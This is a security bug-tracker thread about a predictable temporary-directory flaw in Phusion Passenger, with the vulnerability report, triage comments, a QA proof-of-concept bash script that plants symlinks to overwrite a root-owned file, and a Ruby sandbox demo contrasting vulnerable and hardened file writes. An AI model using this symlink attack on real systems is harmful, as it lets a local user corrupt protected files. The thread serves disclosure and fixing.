Bugzilla – Bug 860994
VUL-1: rubygem-passenger: temporary file issue
Last modified: 2016-05-19 15:30:09 UTC
Via OSS-sec: Can a CVE be assigned to the following issue?

Phusion Passenger creates a "server instance directory" in /tmp during startup, which is a temporary directory that Phusion Passenger uses to store working files. This directory is deleted after Phusion Passenger exits. For various technical reasons, this directory must have a semi-predictable filename. If a local attacker can predict this filename, and pre-creates a symlink with the same filename that points to an arbitrary directory with mode 755, owner root and group root, then the attacker will succeed in making Phusion Passenger write files and create subdirectories inside that target directory. The following files/subdirectories are created:

* control_process.pid
* generation-X, where X is a number.

If you happen to have a file inside the target directory called `control_process.pid`, then that file's contents are overwritten. These files and directories are deleted during Phusion Passenger exit. The target directory itself is not deleted, nor are any other contents inside the target directory, although the symlink is.

It is fixed in upstream version 4.0.33.

References:
https://github.com/phusion/passenger/commit/34b1087870c2
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=736958
https://bugzilla.redhat.com/show_bug.cgi?id=1058992

-- Vincent Danen / Red Hat Security Response Team
Looks like a duplicate of https://bugzilla.novell.com/show_bug.cgi?id=695994. I think that conclusion is still the same, no?
hehe, indeed. The question is why it's not fixed upstream or in Factory.
(In reply to comment #2)
> hehe, indeed. The question is why it's not fixed upstream or in Factory.

Because we do not fix it. It is evaluated as not so critical and we had more urgent problems.
In case we decide to fix it, we should also include https://github.com/phusion/passenger/commit/94428057c602da3d6d34ef75c78091066ecac5c0
We can take the fix from upstream. It's not needed to update existing products; it's just that it could have been fixed along with other passenger updates that we already did meanwhile. So Factory is enough (and to accumulate it with other fixes for the next passenger update).
bugbot adjusting priority
CVE-2014-1831 and CVE-2014-1832
proof of concept for QA:

vagrant@vagrant-kvm-sles11-sp3:~> cat nginx.sh
#!/bin/bash
# Upper bound for the guessed instance-directory suffix.
HL=`cat /proc/sys/kernel/pid_max`
#passenger.1.0.4885
#vagrant-kvm-sles11-sp3:/tmp # ls -l /etc/very-important-stuffs/
# Pre-create every plausible instance directory name and plant a symlink
# named control_process.pid that points at the victim file.
for a in $(seq 1000 $HL); do
  mkdir "/tmp/passenger.1.0.$a"
  ln -s /etc/very-important-stuffs/the-secret-of-universe.txt "/tmp/passenger.1.0.$a/control_process.pid"
done
vagrant@vagrant-kvm-sles11-sp3:~>
vagrant@vagrant-kvm-sles11-sp3:~> cat /etc/very-important-stuffs/the-secret-of-universe.txt
42
vagrant@vagrant-kvm-sles11-sp3:~> ls -l /etc/very-important-stuffs/
total 4
-rw-r--r-- 1 nginx root 3 Mar  2 17:55 the-secret-of-universe.txt
vagrant@vagrant-kvm-sles11-sp3:~> echo 31337 > /etc/very-important-stuffs/the-secret-of-universe.txt
-bash: /etc/very-important-stuffs/the-secret-of-universe.txt: Permission denied
vagrant@vagrant-kvm-sles11-sp3:~> ./nginx.sh
vagrant@vagrant-kvm-sles11-sp3:~> sudo /etc/init.d/nginx start
Starting nginx                                    done
vagrant@vagrant-kvm-sles11-sp3:~> cat /etc/very-important-stuffs/the-secret-of-universe.txt
9621vagrant@vagrant-kvm-sles11-sp3:~>
vagrant@vagrant-kvm-sles11-sp3:~>
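The attack in the OSS-sec report and in the proof of concept above comes down to one pattern: a privileged process writes into a directory whose name an unprivileged user can guess, using an open that follows symlinks. The Ruby script below is an added illustration, not Passenger's code and not the upstream fix; it reproduces the symlink plant from the PoC inside a private sandbox directory (standing in for /tmp) and contrasts the vulnerable write with a hardened one. The hardened version uses two independent measures: Dir.mktmpdir for an unguessable, mode-0700 instance directory, and O_CREAT|O_EXCL|O_NOFOLLOW for the PID file so that a pre-planted symlink (dangling or not) makes the open fail instead of redirecting the write. Function names, the sandbox layout and the sample contents are assumptions made for this example.

```ruby
require 'tmpdir'
require 'fileutils'

PID_FILE = "control_process.pid"

# Attacker step from the PoC: pre-create the predictable instance directory
# and plant a symlink named control_process.pid that points at the victim file.
def plant_symlink(base, dirname, target)
  dir = File.join(base, dirname)
  FileUtils.mkdir_p(dir)
  File.symlink(target, File.join(dir, PID_FILE))
  dir
end

# Vulnerable pattern: a predictable directory name, an already existing
# directory is accepted as-is, and File.write follows the planted symlink.
def vulnerable_write_pid(base, dirname, pid)
  dir = File.join(base, dirname)
  Dir.mkdir(dir) unless File.directory?(dir)
  File.write(File.join(dir, PID_FILE), pid.to_s)
end

# Hardened write: O_CREAT|O_EXCL refuses any pre-existing name (a symlink
# included, even a dangling one) and O_NOFOLLOW refuses to traverse a symlink
# in the final path component. Returns true if the file was created, false
# if the kernel refused the open.
def safe_write_pid(path, pid)
  flags = File::WRONLY | File::CREAT | File::EXCL | File::NOFOLLOW
  File.open(path, flags, 0600) { |f| f.write(pid.to_s) }
  true
rescue Errno::EEXIST, Errno::ELOOP
  false
end

# Hardened directory creation: mkdtemp(3) picks a random suffix and creates
# the directory with mode 0700, so there is no name to pre-create.
def hardened_instance_dir(base)
  Dir.mktmpdir("passenger.", base)
end

# Runs the attack against both patterns inside a throwaway sandbox
# (constructed data; nothing outside the sandbox is touched).
def demo
  Dir.mktmpdir("symlink-poc") do |sandbox|
    victim = File.join(sandbox, "the-secret-of-universe.txt")
    File.write(victim, "42")

    # 1. vulnerable daemon writes its PID through the attacker's symlink
    plant_symlink(sandbox, "passenger.1.0.4885", victim)
    vulnerable_write_pid(sandbox, "passenger.1.0.4885", 9621)
    clobbered = File.read(victim)          # "9621": the victim was overwritten

    # 2. same plant, hardened open: the write is refused and the file survives
    File.write(victim, "42")
    planted = plant_symlink(sandbox, "passenger.1.0.4886", victim)
    refused = !safe_write_pid(File.join(planted, PID_FILE), 9621)
    intact = File.read(victim)             # still "42"

    # 3. unguessable directory: the attacker has nothing to pre-create
    dir = hardened_instance_dir(sandbox)
    created = safe_write_pid(File.join(dir, PID_FILE), 9621)

    { clobbered: clobbered, refused: refused, intact: intact,
      created: created, random_name: File.basename(dir) != "passenger.1.0.4885" }
  end
end
```

Either measure alone closes the PoC, but they fail differently: the random name removes the race entirely, while EXCL|NOFOLLOW turns a successful symlink plant into a startup error that the operator will notice rather than a silent overwrite, which is why a daemon that must keep a semi-predictable directory name should at least adopt the second.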
OK, it is fixed in recent openSUSE and also for SLE12 as it uses newer packages. For old products I do not know of any affected by this issue. So let's close it.